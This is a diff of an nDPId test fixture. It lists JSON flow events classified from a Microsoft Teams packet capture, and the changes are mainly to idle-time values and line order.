-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1587041687745,"flow_last_seen":1587041687963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9450,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1587041687745,"flow_last_seen":1587041687963,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9450,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 
00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 
00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1587041676362,"flow_last_seen":1587041677077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":60045,"flow_avg_l4_payload_len":779,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1587041677042,"flow_last_seen":1587041677375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":20082,"flow_avg_l4_payload_len":590,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041678029,"flow_last_seen":1587041678303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12049,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681745,"flow_last_seen":1587041681895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7654,"flow_avg_l4_payload_len":382,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681755,"flow_last_seen":1587041681908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7598,"flow_avg_l4_payload_len":379,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1587041676362,"flow_last_seen":1587041677077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":60045,"flow_avg_l4_payload_len":779,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1587041677042,"flow_last_seen":1587041677375,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":20082,"flow_avg_l4_payload_len":590,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041678029,"flow_last_seen":1587041678303,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12049,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
+00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681745,"flow_last_seen":1587041681895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7654,"flow_avg_l4_payload_len":382,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681755,"flow_last_seen":1587041681908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7598,"flow_avg_l4_payload_len":379,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041682076,"flow_last_seen":1587041682204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12188,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1587041682077,"flow_last_seen":1587041682212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10552,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} -00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1587041682369,"flow_last_seen":1587041683086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":86354,"flow_avg_l4_payload_len":807,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": 
{"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1587041682376,"flow_last_seen":1587041692106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9736,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1587041682698,"flow_last_seen":1587041691929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14416,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10412,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1587041683333,"flow_last_seen":1587041683650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15546,"flow_avg_l4_payload_len":536,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041685106,"flow_last_seen":1587041685981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8860,"flow_avg_l4_payload_len":369,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685232,"flow_last_seen":1587041685890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9605,"flow_avg_l4_payload_len":384,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00820{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041685248,"flow_last_seen":1587041688035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11696,"flow_avg_l4_payload_len":377,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041686239,"flow_last_seen":1587041686589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} 
-00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041687245,"flow_last_seen":1587041688061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":22353,"flow_avg_l4_payload_len":604,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":307,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
-00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041694219,"flow_last_seen":1587041695993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8320,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041682076,"flow_last_seen":1587041682204,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12188,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1587041682077,"flow_last_seen":1587041682212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10552,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 
+00820{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1587041682369,"flow_last_seen":1587041683086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":86354,"flow_avg_l4_payload_len":807,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1587041682376,"flow_last_seen":1587041692106,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9736,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1587041682698,"flow_last_seen":1587041691929,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14416,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10412,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}} 